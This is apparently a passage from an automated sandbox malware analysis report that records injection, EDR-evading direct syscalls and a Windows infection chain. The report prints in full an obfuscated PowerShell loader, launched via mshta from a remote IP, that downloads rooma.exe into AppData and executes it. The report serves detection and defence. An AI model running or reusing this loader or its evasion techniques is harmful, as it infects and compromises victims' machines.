Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161B594 mov eax, dword ptr fs:[00000030h] 7_2_0161B594
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B245A mov eax, dword ptr fs:[00000030h] 7_2_015B245A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158645D mov eax, dword ptr fs:[00000030h] 7_2_0158645D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166547F mov eax, dword ptr fs:[00000030h] 7_2_0166547F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h] 7_2_015BA470
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h] 7_2_015BA470
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h] 7_2_015BA470
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F453 mov eax, dword ptr fs:[00000030h] 7_2_0164F453
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 mov eax, dword ptr fs:[00000030h] 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 mov eax, dword ptr fs:[00000030h] 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 mov eax, dword ptr fs:[00000030h] 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 mov eax, dword ptr fs:[00000030h] 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 mov eax, dword ptr fs:[00000030h] 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B340D mov eax, dword ptr fs:[00000030h] 7_2_015B340D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h] 7_2_015C8402
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h] 7_2_015C8402
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h] 7_2_015C8402
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA430 mov eax, dword ptr fs:[00000030h] 7_2_015CA430
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h] 7_2_0158E420
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h] 7_2_0158E420
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h] 7_2_0158E420
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C427 mov eax, dword ptr fs:[00000030h] 7_2_0158C427
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016394E0 mov eax, dword ptr fs:[00000030h] 7_2_016394E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015904E5 mov ecx, dword ptr fs:[00000030h] 7_2_015904E5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016654DB mov eax, dword ptr fs:[00000030h] 7_2_016654DB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161A4B0 mov eax, dword ptr fs:[00000030h] 7_2_0161A4B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B480 mov eax, dword ptr fs:[00000030h] 7_2_0158B480
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01599486 mov eax, dword ptr fs:[00000030h] 7_2_01599486
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01599486 mov eax, dword ptr fs:[00000030h] 7_2_01599486
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C34B0 mov eax, dword ptr fs:[00000030h] 7_2_015C34B0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateMutant: Direct from: 0x774635CC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtWriteVirtualMemory: Direct from: 0x77462E3C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtMapViewOfSection: Direct from: 0x77462D1C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtResumeThread: Direct from: 0x774636AC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtProtectVirtualMemory: Direct from: 0x77462F9C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtSetInformationProcess: Direct from: 0x77462C5C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtSetInformationThread: Direct from: 0x774563F9 Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtNotifyChangeKey: Direct from: 0x77463C2C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtProtectVirtualMemory: Direct from: 0x77457B2E Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryInformationProcess: Direct from: 0x77462C26 Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtResumeThread: Direct from: 0x77462FBC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtReadFile: Direct from: 0x77462ADC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQuerySystemInformation: Direct from: 0x77462DFC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtDelayExecution: Direct from: 0x77462DDC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenKeyEx: Direct from: 0x77463C9C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateUserProcess: Direct from: 0x7746371C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtWriteVirtualMemory: Direct from: 0x7746490C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtAllocateVirtualMemory: Direct from: 0x774648EC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQuerySystemInformation: Direct from: 0x774648CC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtReadVirtualMemory: Direct from: 0x77462E8C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateKey: Direct from: 0x77462C6C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtSetInformationThread: Direct from: 0x77462B4C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryAttributesFile: Direct from: 0x77462E6C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtDeviceIoControlFile: Direct from: 0x77462AEC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenSection: Direct from: 0x77462E0C Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateFile: Direct from: 0x77462FEC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenFile: Direct from: 0x77462DCC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryInformationToken: Direct from: 0x77462CAC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtTerminateThread: Direct from: 0x77462FCC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryValueKey: Direct from: 0x77462BEC Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenKeyEx: Direct from: 0x77462B9C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\rooma.exe Section loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\rooma.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 8128 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\netbtugc.exe Thread APC queued: target process: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe" Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lqhlh($iaxounjq, $bjgcheb){[io.file]::writeallbytes($iaxounjq, $bjgcheb)};function zkkoodnkdoxlr($iaxounjq){if($iaxounjq.endswith((kgqievzjx @(47125,47179,47187,47187))) -eq $true){rundll32.exe $iaxounjq }elseif($iaxounjq.endswith((kgqievzjx @(47125,47191,47194,47128))) -eq $true){powershell.exe -executionpolicy unrestricted -file $iaxounjq}elseif($iaxounjq.endswith((kgqievzjx @(47125,47188,47194,47184))) -eq $true){misexec /qn /i $iaxounjq}else{start-process $iaxounjq}};function fbuysivjpuzdjbgt($weuptawbrgutyylesbej){$tpkepuydmoafjohrfuef = new-object (kgqievzjx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$bjgcheb = $tpkepuydmoafjohrfuef.downloaddata($weuptawbrgutyylesbej);return $bjgcheb};function kgqievzjx($ethmockqiu){$kiwxaguqzybt=47079;$pdfpjjruzxwzezix=$null;foreach($qnjiurds in $ethmockqiu){$pdfpjjruzxwzezix+=[char]($qnjiurds-$kiwxaguqzybt)};return $pdfpjjruzxwzezix};function imobwpugekddhys(){$bznvnmxsa = $env:appdata + '\';$flaod = $bznvnmxsa + 'rooma.exe'; if (test-path -path $flaod){zkkoodnkdoxlr $flaod;}else{ $movknubo = fbuysivjpuzdjbgt (kgqievzjx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));lqhlh $flaod $movknubo;zkkoodnkdoxlr $flaod;};;;;}imobwpugekddhys;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lqhlh($iaxounjq, $bjgcheb){[io.file]::writeallbytes($iaxounjq, $bjgcheb)};function zkkoodnkdoxlr($iaxounjq){if($iaxounjq.endswith((kgqievzjx @(47125,47179,47187,47187))) -eq $true){rundll32.exe $iaxounjq }elseif($iaxounjq.endswith((kgqievzjx @(47125,47191,47194,47128))) -eq $true){powershell.exe -executionpolicy unrestricted -file $iaxounjq}elseif($iaxounjq.endswith((kgqievzjx @(47125,47188,47194,47184))) -eq $true){misexec /qn /i $iaxounjq}else{start-process $iaxounjq}};function fbuysivjpuzdjbgt($weuptawbrgutyylesbej){$tpkepuydmoafjohrfuef = new-object (kgqievzjx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$bjgcheb = $tpkepuydmoafjohrfuef.downloaddata($weuptawbrgutyylesbej);return $bjgcheb};function kgqievzjx($ethmockqiu){$kiwxaguqzybt=47079;$pdfpjjruzxwzezix=$null;foreach($qnjiurds in $ethmockqiu){$pdfpjjruzxwzezix+=[char]($qnjiurds-$kiwxaguqzybt)};return $pdfpjjruzxwzezix};function imobwpugekddhys(){$bznvnmxsa = $env:appdata + '\';$flaod = $bznvnmxsa + 'rooma.exe'; if (test-path -path $flaod){zkkoodnkdoxlr $flaod;}else{ $movknubo = fbuysivjpuzdjbgt (kgqievzjx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));lqhlh $flaod $movknubo;zkkoodnkdoxlr $flaod;};;;;}imobwpugekddhys; Jump to behavior
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
Source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509850813.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3836546254.00000000013C1000.00000002.00000001.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3836686361.0000000000CF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
